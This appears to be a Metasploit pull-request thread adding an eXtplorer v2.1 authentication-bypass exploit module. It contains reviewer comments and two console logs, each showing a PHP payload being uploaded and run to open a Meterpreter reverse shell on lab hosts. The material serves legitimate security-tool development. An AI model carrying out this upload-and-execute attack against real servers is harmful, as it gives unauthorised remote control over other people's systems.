Add eXtplorer v2.1 auth bypass exploit module

[bcoles]

Add eXtplorer v2.1 authentication bypass vulnerability exploit module

• Source: http://sourceforge.net/projects/extplorer/
• Tested on:
  • 2.1.0RC5 (Standalone) (Ubuntu Linux)
  • 2.1.0 (Standalone) (Ubuntu Linux)
  • 2.1.1 (Standalone) (Ubuntu Linux)
  • 2.1.2 (Standalone) (Ubuntu Linux)

[brandonprry]

Seems like you could move the "if res and res.code == 200" into a parent if statement, and make these lines a bit shorter, then use an else for the safe check code.

[brandonprry]

I cannot reproduce this and I have a tried a few different tarballs. Can you paste me the md5 or, better yet, email the md5 and archive you used to brandon_perry@rapid7.com

[brandonprry]

My Target URI was wrong.

msf exploit(extplorer_upload_exec) > set TARGETURI /
TARGETURI => /
msf exploit(extplorer_upload_exec) > exploit

[] Started reverse handler on 192.168.1.31:4444
[] 192.168.1.58:80 - Authenticating as user (admin)
[] 192.168.1.58:80 - Authenticated successfully
[] 192.168.1.58:80 - Retrieving writable subdirectories
[] 192.168.1.58:80 - Successfully retrieved writable subdirectory (ftp_tmp)
[] 192.168.1.58:80 - Uploading PHP payload (1785 bytes) to /ftp_tmp
[+] 192.168.1.58:80 - File uploaded successfully
[] 192.168.1.58:80 - Searching directories for file (QtuNy3LIlEmmd.php)
[+] 192.168.1.58:80 - Successfully found file
[] 192.168.1.58:80 - Executing payload (/ftp_tmp/QtuNy3LIlEmmd.php)
[] Sending stage (39217 bytes) to 192.168.1.58
[] Meterpreter session 1 opened (192.168.1.31:4444 -> 192.168.1.58:54293) at 2012-12-30 11:43:03 -0600

getuid

meterpreter >
meterpreter > getuid
Server username: www-data (33)
meterpreter >

[wchen-r7]

you probably don't even need DefaultOptions at all.

[jvazquez-r7]

Did cleanup by myself and retested:

msf  exploit(extplorer_upload_exec) > check
[+] The target is vulnerable.
msf  exploit(extplorer_upload_exec) > rexploit
[*] Reloading module...
[*] Started reverse handler on 192.168.1.128:4444 
[*] 192.168.1.138:80 - Authenticating as user (admin)
[*] 192.168.1.138:80 - Authenticated successfully
[*] 192.168.1.138:80 - Retrieving writable subdirectories
[*] 192.168.1.138:80 - Successfully retrieved writable subdirectory (config)
[*] 192.168.1.138:80 - Uploading PHP payload (1316 bytes) to /eXtplorer/config
[+] 192.168.1.138:80 - File uploaded successfully
[*] 192.168.1.138:80 - Searching directories for file (l3xVr4qUooRD.php)
[+] 192.168.1.138:80 - Successfully found file
[*] 192.168.1.138:80 - Executing payload (/eXtplorer/config/l3xVr4qUooRD.php)
[*] Sending stage (39217 bytes) to 192.168.1.138
[*] Meterpreter session 5 opened (192.168.1.128:4444 -> 192.168.1.138:41454) at 2013-01-09 19:43:18 +0100
^C[-] Exploit failed: Interrupt 
meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer    : ubuntu
OS          : Linux ubuntu 2.6.32-38-generic #83-Ubuntu SMP Wed Jan 4 11:13:04 UTC 2012 i686
Meterpreter : php/php
meterpreter > 

merging!